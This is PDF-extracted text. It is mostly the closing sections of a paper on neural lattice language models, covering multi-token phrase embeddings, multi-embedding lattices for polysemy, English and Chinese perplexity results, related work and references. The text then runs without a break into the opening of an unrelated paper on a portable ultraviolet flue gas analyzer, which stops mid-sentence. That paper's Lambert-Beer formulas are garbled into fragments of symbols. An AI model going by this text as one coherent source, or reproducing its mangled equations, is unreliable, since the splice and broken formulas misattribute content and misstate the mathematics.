Natural language phrases often demonstrate sig- nificant non-compositionality: for example, in En- glish, the phrase “rock and roll” is a genre of mu- sic, but this meaning is not obtained by viewing the words in isolation. In word-level language model- ing, the network is given each of these words as in- put, one at a time; this means it must capture the id- iomaticity in its hidden states, which is quite round- about and potentially a waste of the limited param- eters in a neural network model. A straightforward solution is to have an embedding for the entire multi- token phrase, and use this to input the entire phrase to the LSTM in a single timestep. However, it is also important that the model is able to decide whether the non-compositional representation is appropriate given the context: sometimes, “rock” is just a rock. Additionally, by predicting multiple tokens in a single timestep, we are able to decrease the num- ber of timesteps across which the gradient must travel, making it easier for information to be prop- agated across the sentence. This is even more useful in non-space-delimited languages such as Chinese, in which segmentation is non-trivial, but character- level modeling leads to many sentences being hun- dreds of tokens long. There is also psycho-linguistic evidence which supports the fact that humans incorporate multi- token phrases into their mental lexicon. Siyanova- Chanturia et al. (2011) show that native speakers of a language have significantly reduced response time when processing idiomatic phrases, whether they are used in an idiomatic sense or not, while Bannard and Matthews (2008) show that children learning a lan- guage are better at speaking common phrases than uncommon ones. This evidence lends credence to the idea that multi-token lexical units are a useful tool for language modeling in humans, and so may also be useful in computational models. 4.1.2 Modeling Strategy The underlying lattices utilized in our multi-token phrase experiments are “dense” lattices: lattices where every edge (below a certain length L) is present (Fig. 2, c). This is for two reasons. First, since every sequence of tokens is given an oppor- tunity to be included in the path, all segmentations are candidates, which will potentially allow us to discover arbitrary types of segmentations without a prejudice towards a particular theory of which multi- token units we should be using. Second, using a dense lattice makes minibatching very straightfor- ward by ensuring that the computation graphs for each sentence are identical. If the lattices were not dense, the lattices of various sentences in a mini- batch could be different; it then becomes necessary to either calculate a differently-shaped graph for ev- ery sentence, preventing minibatching and hurting training efficiency, or calculate and then mask out 533 the missing edges, leading to wasted computation. Since only edges of length L or less are present, the maximum in-degree of any node in the lattice D is no greater than L, giving us the time bound O(L|X|). 4.1.3 Token Vocabularies Storing an embedding for every possible multi- token chunk would require |V |L unique embed- dings, which is intractable. Therefore, we construct our multi-token embeddings by merging composi- tional and non-compositional representations. Non-compositional Representation We first es- tablish a priori set of “core” chunk-level tokens, each have a dense embedding. In order to guarantee full coverage of sentences, we first add every unit-level token to this vocabulary, e.g. every word in the cor- pus for a word-level model. Following this, we also add the most frequent n-grams (where 1 < n ≤ L). This ensures that the vast majority of sentences will have several longer chunks appear within them, and so will be able to take advantage of tokens at larger granularities. Compositional Representation However, the non-compositional embeddings above only account for a subset of all n-grams, so we additionally construct compositional embeddings for each chunk by running a BiLSTM encoder over the individual embeddings of each unit-level token within it (Dyer et al., 2016). In this way, we can create a unique embedding for every sequence of unit-level tokens. We use this composition function on chunks regardless of whether they are assigned non- compositional embeddings or not, as even high- frequency chunks may display compositional prop- erties. Thus, for every chunk, we compute the chunk embedding vector xji by concatenating the compo- sitional embedding with the non-compositional em- bedding if it exists, or otherwise with an <UNK> embedding. Sentinel Mixture Model for Predictions At each timestep, we want to use our LSTM hidden state ht to assign some probability mass to every chunk with a length less than L. To do this, we follow Merity et al. (2016) in creating a new “sentinel” token <s> and adding it to our vocabulary. At each timestep, we first use our neural network to calculate a score for each chunk C in our vocabulary, including the sentinel token. We do a softmax across these scores to assign a probability pmain(Ct+1 | ht;θ) to every chunk in our vocabulary, and also to <s>. For token sequences not represented in our chunk vocabulary, this probability pmain(Ct+1 | ht;θ) = 0. Next, the probability mass assigned to the sentinel value, pmain(<s> | ht;θ), is distributed across all possible tokens sequences of length less than L, us- ing another LSTM with parameters θsub. Similar to Jozefowicz et al. (2016), this sub-LSTM is initial- ized by passing in the hidden state of the main lattice LSTM at that timestep. This gives us a probability for each sequence psub(c1,c2, . . . ,cL | ht;θsub). The final formula for calculating the probability mass assigned to a specific chunk C is: p(C | ht;θ) =pmain(C | ht;θ)+ pmain(<s> | ht;θ)psub(C | ht;θsub). 4.2 Incorporating Polysemous Tokens 4.2.1 Motivation A second shortcoming of current language mod- eling approaches is that each word is associated with only one embedding. For highly polysemous words, a single embedding may be unable to represent all meanings effectively. There has been past work in word embeddings which has shown that using multiple embeddings for each word is helpful in constructing a useful repre- sentation. Athiwaratkun and Wilson (2017) repre- sented each word with a multimodal Gaussian dis- tribution and demonstrated that embeddings of this form were able to outperform more standard skip- gram embeddings on word similarity and entailment tasks. Similarly, Chen et al. (2015) incorporate standard skip-gram training into a Gaussian mixture framework and show that this improves performance on several word similarity benchmarks. When a polysemous word is represented using only a single embedding in a language modeling task, the multimodal nature of the true embedding distribution may causes the resulting embedding to be both high-variance and skewed from the positions of each of the true modes. Thus, it is likely useful to represent each token with multiple embeddings when doing language modeling. 534 4.2.2 Modeling Strategy For our polysemy experiments, the underlying lat- tices are multi-lattices: lattices which are also multi- graphs, and can have any number of edges between any given pair of nodes (Fig. 2, d). Lattices set up in this manner allow us to incorporate multiple em- beddings for each word. Within a single sentence, any pair of nodes corresponds to the start and end of a particular subsequence of the full sentence, and is thus associated with a specific token. Each edge between them is a unique embedding for that to- ken. While many strategies for choosing the num- ber of embeddings exist in the literature (Neelakan- tan et al., 2014), in this work, we choose a number of embeddings E and assign that many embeddings to each word. This ensures that the maximum in- degree of any node in the lattice D, is no greater than E, giving us the time bound O(E|X|). In this work, we do not explore models that in- clude both chunk vocabularies and multiple embed- dings. However, combining these two techniques, as well as exploring other, more complex lattice struc- tures, is an interesting avenue for future work. 5 Experiments 5.1 Data We perform experiments on two languages: English and Chinese, which provide an interesting contrast in linguistic features.4 In English, the most common benchmark for language modeling recently is the Penn Tree- bank, specifically the version preprocessed by Tomáš Mikolov (2010). However, this corpus is lim- ited by being relatively small, only containing ap- proximately 45,000 sentences, which we found to be insufficient to effectively train lattice language mod- els.5 Thus, we instead used the Billion Word Corpus (Chelba et al., 2014). Past experiments on the BWC typically modeled every word without restricting the vocabulary, which results in a number of challenges regarding the modeling of open vocabularies that are orthogonal to this work. Thus, we create a pre- 4Code to reproduce datasets and experiments is available at: http://github.com/jbuckman/ neural-lattice-language-models 5Experiments using multi-word units resulted in overfitting, regardless of normalization and hyperparameter settings. processed version of the data in the same manner as Mikolov, lowercasing the words, replacing num- bers with <N> tokens, and <UNK>ing all words beyond the ten thousand most common. Addition- ally, we restricted the data set to only include sen- tences of length 50 or less, ensuring that large mini- batches could fit in GPU memory. Our subsampled English corpus contained 29,869,166 sentences, of which 29,276,669 were used for training, 5,000 for validation, and 587,497 for testing. To validate that our methods scale up to larger language modeling scenarios, we also report a smaller set of large-scale experiments on the full billion word benchmark in Appendix A. In Chinese, we ran experiments on a subset of the Chinese GigaWord corpus. Chinese is also par- ticularly interesting because unlike English, it does not use spaces to delimit words, so segmentation is non-trivial. Therefore, we used a character-level lan- guage model for the baseline, and our lattice was composed of multi-character chunks. We used sen- tences from Guangming Daily, again <UNK>ing all but the 10,000 most common tokens and restrict- ing the selected sentences to only include sentences of length 150 or less. Our subsampled Chinese cor- pus included 934,101 sentences for training, 5,000 for validation, and 30,547 for testing. 5.2 Main Experiments We compare a baseline LSTM model, dense lattices of size 1, 2, and 3, and a multilattice with 2 and 3 embeddings per word. The implementation of our networks was done in DyNet (Neubig et al., 2017). All LSTMs had 2 lay- ers, each with a hidden dimension of 200. Vari- ational dropout (Gal and Ghahramani, 2016) of .2 was used on the Chinese experiments, but hurt per- formance on the English data, so it was not used. The 10,000 word embeddings each had dimension 256. For lattice models, chunk vocabularies were se- lected by taking the 10,000 words in the vocabulary and adding the most common 10,000 n-grams with 1 < n ≤ L. The weights on the final layer of the net- work were tied with the input embeddings, as done by Press and Wolf (2017) and Inan et al. (2017). In all lattice models, hidden states were computed using a weighted expectation (§3.3.3) unless men- tioned otherwise. In multi-embedding models, em- 535 Table 1: Results on English language modeling task Model Valid. Perp. Test Perp. Baseline 47.64 48.62 Multi-Token (L = 1) 45.69 47.21 Multi-Token (L = 2) 44.15 46.12 Multi-Token (L = 3) 45.19 46.84 Multi-Emb (E = 2) 44.80 46.32 Multi-Emb (E = 3) 42.76 43.78 Table 2: Results on Chinese language modeling task Model Valid. Perp. Test Perp. Baseline 41.46 40.72 Multi-Token (L = 1) 49.86 50.99 Multi-Token (L = 2) 38.61 37.22 Multi-Token (L = 3) 33.01 32.19 Multi-Emb (E = 2) 40.30 39.28 Multi-Emb (E = 3) 45.72 44.40 bedding sizes were decreased so as to maintain the same total number of parameters. All models were trained using the Adam optimizer with a learning rate of .01 on a NVIDIA K80 GPU. The results can be seen in Table 1 and Table 2. In the multi-token phrase experiments, many ad- ditional parameters are accrued by the BiLSTM encoder and sub-LSTM predictive model, making them not strictly comparable to the baseline. To ac- count for this, we include results for L = 1, which, like the baseline LSTM approach, fails to leverage multi-token phrases, but includes the same number of parameters as L = 2 and L = 3. In both the English and Chinese experiments, we see the same trend: increasing the maximum lat- tice size decreases the perplexity, and for L = 2 and above, the neural lattice language model outper- forms the baseline. Similarly, increasing the number of embeddings per word decreases the perplexity, and for E = 2 and above, the multiple-embedding model outperforms the baseline. 5.3 Hidden State Calculation Experiments We compare the various hidden-state calculation ap- proaches discussed in Section 3.3 on the English data using a lattice of size L = 2 and dropout of .2. These results can be seen in Table 3. Table 3: Hidden state calculation comparison results Model Valid. Perp. Test Perp. Baseline 64.18 60.67 Direct (§3.3.1) 59.74 55.98 Monte Carlo (§3.3.2) 62.97 59.08 Marginalization (§3.3.3) 58.62 55.06 GS Interpolation (§3.3.4) 59.19 55.73 For all hidden state calculation techniques, the neural lattice language models outperform the LSTM baseline. The ancestral sampling technique used by Chan et al. (2017) is worse than the others, which we found to be due to it getting stuck in a lo- cal minimum which represents almost everything as unigrams. There is only a small difference between the perplexities of the other techniques. 5.4 Discussion and Analysis Neural lattice language models convincingly out- perform an LSTM baseline on the task of lan- guage modeling. One interesting note is that in En- glish, which is already tokenized into words and highly polysemous, utilizing multiple embeddings per word is more effective than including multi- word tokens. In contrast, in the experiments on the Chinese data, increasing the lattice size of the multi- character tokens is more important than increasing the number of embeddings per character. This cor- responds to our intuition; since Chinese is not tok- enized to begin with, utilizing models that incorpo- rate segmentation and compositionality of elemen- tary units is very important for effective language modeling. To calculate the probability of a sentence, the neural lattice language model implicitly marginal- izes across latent segmentations. By inspecting the probabilities assigned to various edges of the lattice, we can visualize these segmentations, as is done in Fig. 3. The model successfully identifies bi- grams which correspond to non-compositional com- pounds, like “prime minister”, and bigrams which correspond to compositional compounds, such as “a quarter”. Interestingly, this does not occur for all high-frequency bigrams; it ignores those that are not inherently meaningful, such as “<UNK> in”, yield- ing qualitatively good phrases. In the multiple-embedding experiments, it is pos- 536 Figure 3: Segmentation of three sentences randomly sampled from the test corpus, using L = 2. Green numbers show probability assigned to token sizes. For example, the first three words in the first sentence have a 59% and 41% chance of being “please let me” or “please let me” respectively. Boxes around words show greedy segmentation. Table 4: Comparison of randomly-selected contexts of several words selected from the vocabulary of the Billion Word Corpus, in which the model preferred one embedding over the other. rock1 rock2 ...at the <unk> pop , rock and jazz... ...including hsbc , northern rock and... ...a little bit <unk> rock ,... ...pakistan has a <unk> rock music scene... ...on light rock and <unk> stations... ...spokesman for round rock , <unk>... bank1 bank2 ...being a bank holiday in... ...the bank of england has... ...all the us bank runs and... ...with the royal bank of scotland... ...by getting the bank ’s interests... ...development bank of japan and the... page1 page2 ...on page <unk> of the... ...was it front page news... ...a source told page six .... ...himself , tony page , the former ... ...on page <unk> of the... ...sections of the page that discuss... profile1 profile2 ...( <unk> : quote , profile , research )... ...so <unk> the profile of the city... ...( <unk> : quote , profile , research )... ...the highest profile <unk> held by... ...( <unk> : quote , profile , research )... ...from high i , elite schools ,... edition1 edition2 ... of the second edition of windows... ...of the new york edition . ... ... this month ’s edition of<unk> , the ... ...of the new york edition . ... ...forthcoming d.c. edition of the hit... ...of the new york edition . ... rodham1 rodham2 ...senators hillary rodham clinton and... ...making hillary rodham clinton his... ...hillary rodham clinton ’s campaign has... sible to see which of the two embeddings of a word was assigned the higher probability for any specific test-set sentence. In order to visualize what types of meanings are assigned to each embedding, we select sentences in which one embedding is preferred, and look at the context in which the word is used. Sev- eral examples of this can be seen in Table 4; it is clear from looking at these examples that the system does learn distinct embeddings for different senses of the word. What is interesting, however, is that it does not necessarily learn intuitive semantic mean- ings; instead it tends to group the words by the con- 537 text in which they appear. In some cases, like profile and edition, one of the two embeddings simply cap- tures an idiosyncrasy of the training data. Additionally, for some words, such as rodham in Table 4, the system always prefers one embedding. This is promising, because it means that in future work it may be possible to further improve accu- racy and training efficiency by assigning more em- beddings to polysemous words, instead of assigning the same number of embeddings to all words. 6 Related Work Past work that utilized lattices in neural models for natural language processing centers around us- ing these lattices in the encoder portion of machine translation. Su et al. (2016) utilized a variation of the Gated Recurrent Unit (GRU) that operated over lattices, and preprocessed lattices over Chi- nese characters that allowed it to effectively encode multiple segmentations. Additionally, Sperber et al. (2017) proposed a variation of the TreeLSTM with the goal of creating an encoder over speech lattices in speech-to-text. Our work tackles language mod- eling rather than encoding, and thus addresses the issue of marginalization over the lattice. Another recent work which marginalized over multiple paths through a sentence is Ling et al. (2016). The authors tackle the problem of code gen- eration, where some components of the code can be copied from the input, via a neural network. Our work expands on this by handling multi-word tokens as input to the neural network, rather than passing in one token at a time. Neural lattice language models improve accuracy by helping the gradient flow over smaller paths, pre- venting vanishing gradients. Many hierarchical neu- ral language models have been proposed with a sim- ilar objective (Koutnik et al., 2014; Zhou et al., 2017). Our work is distinguished from these by the use of latent token-level segmentations that cap- ture meaning directly, rather than simply being high- level mechanisms to encourage gradient flow. Chan et al. (2017) propose a model for predict- ing characters at multiple granularities in the de- coder segment of a machine translation system. Our work expands on theirs by considering the entire lat- tice at once, rather than considering a only a sin- gle path through the lattice via ancestral sampling. This allows us to train end-to-end without the model collapsing to a local minimum, with no exploration bonus needed. Additionally, we propose a more broad class of models, including those incorporat- ing polysemous words, and apply our model to the task of word-level language modeling, rather than character-level transcription. Concurrently to this work, van Merriënboer et al. (2017) have proposed a neural language model that can similarly handle multiple scales. Our work is differentiated in that it is more general: utilizing an open multi-token vocabulary, proposing multiple techniques for hidden state calculation, and handling polysemy using multi-embedding lattices. 7 Future Work In the future, we would like to experiment with uti- lizing neural lattice language models in extrinsic evaluation, such as machine translation and speech recognition. Additionally, in the current model, the non-compositional embeddings must be selected a priori, and may be suboptimal. We are exploring techniques to store fixed embeddings dynamically, so that the non-compositional phrases can be se- lected as part of the end-to-end training. 8 Conclusion In this work, we have introduced the idea of a neural lattice language model, which allows us to marginal- ize over all segmentations of a sentence in an end- to-end fashion. In our experiments on the Billion Word Corpus and Chinese GigaWord corpus, we demonstrated that the neural lattice language model beats an LSTM-based baseline at the task of lan- guage modeling, both when it is used to incorpo- rate multiple-word phrases and multiple-embedding words. Qualitatively, we observed that the latent segmentations generated by the model correspond well to human intuition about multi-word phrases, and that the varying usage of words with multiple embeddings seems to also be sensible. Acknowledgements The authors would like to thank Holger Schwenk, Kristina Toutanova, Cindy Robinson, and all the re- viewers of this work for their invaluable feedback. 538 References Oliver Adams, Adam Makarucha, Graham Neubig, Steven Bird, and Trevor Cohn. 2017. Cross-lingual word embeddings for low-resource language model- ing. In Proceedings of the 15th Conference of the Eu- ropean Chapter of the Association for Computational Linguistics: Volume 1, Long Papers, volume 1, pages 937–947. Ben Athiwaratkun and Andrew Wilson. 2017. Multi- modal word distributions. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), volume 1, pages 1645–1656. Dzmitry Bahdanau, Jan Chorowski, Dmitriy Serdyuk, Philemon Brakel, and Yoshua Bengio. 2016. End- to-end attention-based large-vocabulary speech recog- nition. In IEEE International Conference on Acous- tics, Speech and Signal Processing, pages 4945–4949. IEEE. Colin Bannard and Danielle Matthews. 2008. Stored word sequences in language learning: The effect of familiarity on children’s repetition of four-word com- binations. Psychological Science, 19(3):241–248. William Chan, Yu Zhang, Quoc Le, and Navdeep Jaitly. 2017. Latent sequence decompositions. 5th Interna- tional Conference on Learning Representations. Ciprian Chelba, Tomas Mikolov, Mike Schuster, Qi Ge, Thorsten Brants, Phillipp Koehn, and Tony Robinson. 2014. One billion word benchmark for measuring progress in statistical language modeling. Interspeech. Xinchi Chen, Xipeng Qiu, Jingxiang Jiang, and Xuanjing Huang. 2015. Gaussian mixture embeddings for mul- tiple word prototypes. CoRR, abs/1511.06246. Sumit Chopra, Michael Auli, Alexander M Rush, and SEAS Harvard. 2016. Abstractive sentence sum- marization with attentive recurrent neural networks. North American Chapter of the Association for Com- putational Linguistics: Human Language Technolo- gies, pages 93–98. Pierre Dupont and Ronald Rosenfeld. 1997. Lattice based language models. Technical report, DTIC Doc- ument. Chris Dyer, Adhiguna Kuncoro, Miguel Ballesteros, and Noah A Smith. 2016. Recurrent neural network gram- mars. North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, pages 199–209. Jeffrey L. Elman. 1990. Finding structure in time. Cog- nitive science, 14(2):179–211. Yarin Gal and Zoubin Ghahramani. 2016. A theoreti- cally grounded application of dropout in recurrent neu- ral networks. In Advances in Neural Information Pro- cessing Systems, pages 1019–1027. Sharon Goldwater, Thomas L. Griffiths, Mark Johnson, et al. 2007. Distributional cues to word boundaries: Context is important. In H. Caunt-Nulton, S. Kilati- late, and I. Woo, editors, BUCLD 31: Proceedings of the 31st Annual Boston University Conference on Lan- guage Development, pages 239–250. Somerville, Mas- sachusetts: Cascadilla Press. Alex Graves, Abdel-rahman Mohamed, and Geoffrey Hinton. 2013. Speech recognition with deep recurrent neural networks. In IEEE International Conference on Acoustics, Speech and Signal Processing, pages 6645– 6649. IEEE. Klaus Greff, Rupesh K. Srivastava, Jan Koutnı́k, Bas R. Steunebrink, and Jürgen Schmidhuber. 2016. LSTM: A search space odyssey. IEEE Transactions on Neural Networks and Learning Systems. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. Kyuyeon Hwang and Wonyong Sung. 2017. Character- level language modeling with hierarchical recurrent neural networks. In IEEE International Conference on Acoustics, Speech and Signal Processing, pages 5720– 5724. IEEE. Hakan Inan, Khashayar Khosravi, and Richard Socher. 2017. Tying word vectors and word classifiers: A loss framework for language modeling. 5th International Conference on Learning Representations. Eric Jang, Shixiang Gu, and Ben Poole. 2017. Categori- cal reparameterization with Gumbel-Softmax. 5th In- ternational Conference on Learning Representations. Rafal Jozefowicz, Oriol Vinyals, Mike Schuster, Noam Shazeer, and Yonghui Wu. 2016. Exploring the limits of language modeling. arXiv:1602.02410. Philipp Koehn and Rebecca Knowles. 2017. Six chal- lenges for neural machine translation. In Proceedings of the First Workshop on Neural Machine Translation, pages 28–39. Jan Koutnik, Klaus Greff, Faustino Gomez, and Juergen Schmidhuber. 2014. A clockwork RNN. Proceedings of Machine Learning Research. Wang Ling, Isabel Trancoso, Chris Dyer, and Alan W. Black. 2015. Character-based neural machine transla- tion. CoRR, abs/1511.04586. Wang Ling, Edward Grefenstette, Karl Moritz Hermann, Tomáš Kočiskỳ, Andrew Senior, Fumin Wang, and Phil Blunsom. 2016. Latent predictor networks for code generation. Association for Computational Lin- guistics. Chris J Maddison, Andriy Mnih, and Yee Whye Teh. 2017. The concrete distribution: A continuous relax- ation of discrete random variables. 5th International Conference on Learning Representations. 539 Stephen Merity, Caiming Xiong, James Bradbury, and Richard Socher. 2016. Pointer sentinel mixture mod- els. 4th International Conference on Learning Repre- sentations. Arvind Neelakantan, Jeevan Shankar, Re Passos, and An- drew Mccallum. 2014. Efficient nonparametric es- timation of multiple embeddings per word in vector space. In Proceedings of EMNLP. Citeseer. Graham Neubig, Masato Mimura, Shinsuke Mori, and Tatsuya Kawahara. 2010. Learning a language model from continuous speech. In INTERSPEECH, pages 1053–1056. Graham Neubig, Chris Dyer, Yoav Goldberg, Austin Matthews, Waleed Ammar, Antonios Anastasopoulos, Miguel Ballesteros, David Chiang, Daniel Clothiaux, Trevor Cohn, et al. 2017. DyNet: The dynamic neural network toolkit. arXiv preprint arXiv:1701.03980. Ofir Press and Lior Wolf. 2017. Using the output embed- ding to improve language models. 5th International Conference on Learning Representations. Yael Ravin and Claudia Leacock. 2000. Polysemy: The- oretical and Computational Approaches. OUP Ox- ford. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2015. Neural machine translation of rare words with subword units. Association for Computational Lin- guistics. Anna Siyanova-Chanturia, Kathy Conklin, and Norbert Schmitt. 2011. Adding more fuel to the fire: An eye-tracking study of idiom processing by native and non-native speakers. Second Language Research, 27(2):251–272. Matthias Sperber, Graham Neubig, Jan Niehues, and Alex Waibel. 2017. Neural lattice-to-sequence mod- els for uncertain inputs. In Proceedings of the 2017 Conference on Empirical Methods in Natural Lan- guage Processing, pages 1380–1389. Jinsong Su, Zhixing Tan, Deyi Xiong, and Yang Liu. 2016. Lattice-based recurrent neural net- work encoders for neural machine translation. CoRR, abs/1609.07730, ver. 2. Kai Sheng Tai, Richard Socher, and Christopher D. Man- ning. 2015. Improved semantic representations from tree-structured long short-term memory networks. As- sociation for Computational Linguistics. Lukáš Burget Jan Honza Cernock Sanjeev Khudanpur Tomáš Mikolov, Martin Karafiát. 2010. Recur- rent neural network based language model. Pro- ceedings of the 11th Annual Conference of the Inter- national Speech Communication Association, pages 1045–1048. Bart van Merriënboer, Amartya Sanyal, Hugo Larochelle, and Yoshua Bengio. 2017. Multiscale sequence modeling with a learned dictionary. arXiv preprint arXiv:1707.00762. Ladislav Zgusta. 1967. Multiword lexical units. Word, 23(1-3):578–587. Hao Zhou, Zhaopeng Tu, Shujian Huang, Xiaohua Liu, Hang Li, and Jiajun Chen. 2017. Chunk-based bi- scale decoder for neural machine translation. Associa- tion for Computational Linguistics. A Large-Scale Experiments To verify that our findings scale to state-of-the- art language models, we also compared a baseline model, dense lattices of size 1 and 2, and a multi- lattice with 2 embeddings per word on the full byte- pair encoded Billion Word Corpus. In this set of experiments, we take the full Bil- lion Word Corpus, and apply byte-pair encoding as described by Sennrich et al. (2015) to construct a vocabulary of 10,000 sub-word tokens. Our model consists of three LSTM layers, each with 1500 hid- den units. We train the model for a single epoch over the corpus, using the Adam optimizer with learning rate .0001 on a P100 GPU. We use a batch size of 40, and variational dropout of 0.1. The 10,000 sub-word embeddings each had dimension 600. For lattice models, chunk vocabularies were selected by taking the 10,000 sub-words in the vocabulary and adding the most common 10,000 n-grams with 1 < n ≤ L. The weights on the final layer of the network were tied with the input embeddings, as done by Press and Wolf (2017) and Inan et al. (2017). In all lattice models, hidden states were computed using weighted expectation (§3.3.3). In multi-embedding models, embedding sizes were decreased so as to maintain the same total number of parameters. Results of these experiments are in Table 5. The performance of the baseline model is roughly on par with that of state-of-the-art models on this database; differences can be explained by model size and hy- perparameter tuning. The results show the same trend as the results of our main experiments, in- dicating that the performance gains shown by our smaller neural lattice language models generalize to the much larger datasets used in state-of-the-art sys- tems. 540 Table 5: Results on large-scale Billion Word Corpus Model Valid. Test Sec./ Perp. Perp. Batch Baseline 54.1 37.7 .45 Multi-Token (L = 1) 54.2 37.4 .82 Multi-Token (L = 2) 53.9 36.4 4.85 Multi-Emb (E = 2) 53.8 35.2 2.53 Table 6: Vocabulary size comparison Model Valid. Perp. Test Perp. Baseline 64.18 60.67 10000-chunk vocab 58.62 55.06 20000-chunk vocab 57.40 54.15 B Chunk Vocabulary Size We compare a 2-lattice with a non-compositional chunk vocabulary of 10,000 phrases with a 2- lattice with a non-compositional chunk vocabulary of 20,000 phrases. The results can be seen in Table 6. Doubling the number of non-compositional em- beddings present decreases the perplexity, but only by a small amount. This is perhaps to be expected, given that doubling the number of embeddings cor- responds to a large increase in the number of model parameters for phrases that may have less data with which to train them. 541 542 work_icxav2q5tjbe7kce734r5lp4wi ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 13 The Portable Gas Analyzer Based on the Spectrum Xu Shuping School of Computer Science and Engineering Xi’an Technological University Xi’an 710021, China e-mail: 563937848@qq.com; xusp686@163.com Xu pei School of Computer Science and Engineering Xi’an Technological University Xi’an 710021, China Dong Qiyu School of Computer Science and Engineering Xi’an Technological University Xi’an 710021, China Su Xiaohui School of Computer Science and Engineering Xi’an Technological University Xi’an 710021, China Abstract—It is a problem of spectra analysis of flue gas that how to separate and calculate the concentration of different kinds of gas from continuous mixed gas absorption spectrum signal. So based on experimental data, a new iteration of the circular algorithm is put forward on the basis of Lambert-Beer's law. This algorithm, using the superposition of the absorbance, makes data nonlinear fitting. It takes the advantages of the wavelength optimum and the circular iteration to distinguishing the gas mixture of different composition. Experimental results show that: this method can at once calculate a variety of harmful gas concentration and accuracy up to ± 3%. it has strong anti-jamming capability and is suitable for practical application of engineering. Keywords-Circular Iteration; Ultraviolet Spectrum; Micro-spectrometer; Embedded Systems I. INTRODUCTION With the rapid development of economic and people living standard unceasing improvement the popularity of the development of heavy industry and transportation, with a large number of harmful substances into the environment atmosphere, changed the composition of normal air, worsen air quality[1]. Health problems, which caused by the atmospheric pollution has caused governments and people of great importance to it. Therefore, monitoring SO2 and NOx become one of the important subject of environmental protection[2]. For the accurate monitoring of the real-time quality, ecological environment and pollution to the environment, to provide accurate basis for the environmental protection departments at various levels supervision, management and environment decision, urgent need a large number of modern environmental monitoring instruments. Through to the present situation of flue gas analyzer in the domestic and foreign research and analysis, portable flue gas on the domestic market at present the main monitoring method is electrochemical analysis instrument, infrared gas analyzer and differential absorption spectrum. Electrochemical analysis instrument each sensor can only be measured a chemical composition in flue gas, if need to measure six ingredients you need six sensors. The chemical battery principle led to zero drift in the development of the system and cross interference, sensor lifetime is also difficult to solve the problem[3]. There is no absorption peak to NO2 in the infrared spectrum analyzer, cannot monitor NO2, but can only detect the NO content, through the assumptions to NO2 concentrations. At the same time as infrared spectrum analyzer adopts wheel filter method, each time only one gas measurement, can not measure a variety of gases at the same time[4]. Differential absorption measured gas to uv and visible light waves, on the basis of the differential absorption spectrum by the strength of the differential mailto:xusp686@163.com mailto:xusp686@163.com 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 14 absorption spectrum inversion gas concentrations, in the traditional algorithm of differential absorption, the application of least square method of gas concentration for calculating optimal estimation equation is complex, and easy in pathological conditions[5]. Accordingly based on Lambert Beer law and absorbance of dual stack, a mutually recursive iteration is presented more gas concentration decoding algorithm, the process of the algorithm is presented, and verify the effectiveness of the algorithm. This system using the Ocean Optic micro spectrometer combining with embedded technology company has developed a set of portable flue gas analyzer[6]. This instrument is to overcome the disadvantages of the electrochemical sensor, had been achieved and sensor life problems, and at the same time for accurate measurement of gases and no cross interference. II. WORKING PRINCIPLE OF THE SYSTEM Portable flue gas analyzer system structure consists of three parts, part data collection, data processing part and the human-computer interaction part. Data acquisition part by sampling probe, flue gas sampling pump, an ultraviolet light and miniature spectrum analyzer, collecting gas mainly accomplished by ultraviolet light and miniature spectrum analyzer spectrum before and after the data is converted into digital signal transmitted to the data processing part. Data processing part of ARM microcontroller CPU core module and peripheral circuit, main is to electrical signals were collected by using corresponding algorithm to calculate the gas concentration of all kinds of gas in the flue gas composition. The human-computer interaction part consists of LCD display and keyboard, mainly to complete the real-time display of gas concentration, and through the keyboard to control the storage of data and related parameters Settings. III. THE BASIC PRINCIPLE OF LOOP ITERATION METHOD A. Lambert-Beerlaw The mathematical model of Lambert-Beer's law [7-8] said ＝ In the formula: A is absorbance; T is the transmittance, project the light intensity is than the incident light intensity;C is light-absorbing substance concentration; B is the absorption layer thickness. Its physical meaning is: when a beam of parallel light through a vertical uniform a material suction light scattering, the absorbance and the concentration and absorption material suction light is directly proportional to the thickness. Absorbance [16] A binary additive think: if the binary and multicomponent mixture components have absorbed A wave number, the total absorbance at the wave number is equal to the arithmetic of absorbance and at all levels. B. The Mathematical model The logarithmic of Lambert-Beer's law said: lg c R D A K S D          In the formula: A is absorbance; R is photon number (zero point); S is the number of through the photon; λ is selected for a wavelength; K is constant (associated with the length of wavelength and absorption tube); C is a single gas concentration; D is dark spectrum photon number (related to the integration time can take a fixed constant). Two kinds of mixed gas Lambert-Beer absorbance expression can be represented as: 1 1 1 lg R D A S D         2 2 2 lg R D A S D         According to the law of superposition of binary: 1 2 A A A   1 2 1 2 lg lg lg R D R D R D S D S D S D                      i.e. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 15  1 2 1 2 R D R D R D S D S D S D                      By formula (7) can be know in a particular incident light wavelength lambda, the mixed gas of photon number and subtract its dark photons through the photon number, equal to the selected wavelength under different gas on the number of incident photons and through the photon number minus the dark photon number of the product. In the actual gas absorption model of gas absorption and scattering all play a role in the formation of spectrum, so the experiment of gas absorption spectra contain two parts. Part of gas molecules on the absorption of photons, ultraviolet band is mainly caused by the electron transition of the gas molecules absorbed. Another part of the scattering is gas or smoke without selective absorption caused by light attenuation. Because this system adopts the removable detection method, gas extraction, you first after a pretreatment device for flue gas filtration, drying, cooling and other processing. Filtration process can be 0. Lum or above level particle filter out completely, and flue gas molecules of the diameter of the order of magnitude are below 1 nm. Instrument of the selected work between the wavelength of 190 nm - 290nm, greater than the molecules or residual particle diameter, so that the gases to be detected is mainly gas molecules Rayleigh scattering. The actual operation process we with nitrogen gas as zero, the spectral curve is called the zero gas, nitrogen gas molecules, although about 190 nm - 290 nm uv absorption, but also produces Rayleigh scattering. That is zero gas line is light after zero gas scattering spectral lines. By spectrogram, found that in the absence of absorption bands, such as nitric oxide line outside the three absorption peak is coincidence with zero gas lines, namely in the absence of gas absorption bands of two gases scattering light is the same. So the Rayleigh scattering of gas absorption interference can be ruled out by the method of using the zero gas line as a reference. According to the Lambert Beer-law, exclude mie scattering and Rayleigh scattering in gas detection, then the device applicable gas absorption model becomes: 0 ( ) ln( ) ( ( ) ) ( ) i i I L C I         Which represents the light source through 0 ( )I  zero gas scattering by spectrometer in wavelength  after the received light intensity, i ( ) represents the ith kind of gases at wavelength  absorption cross section, L is the length of the pool 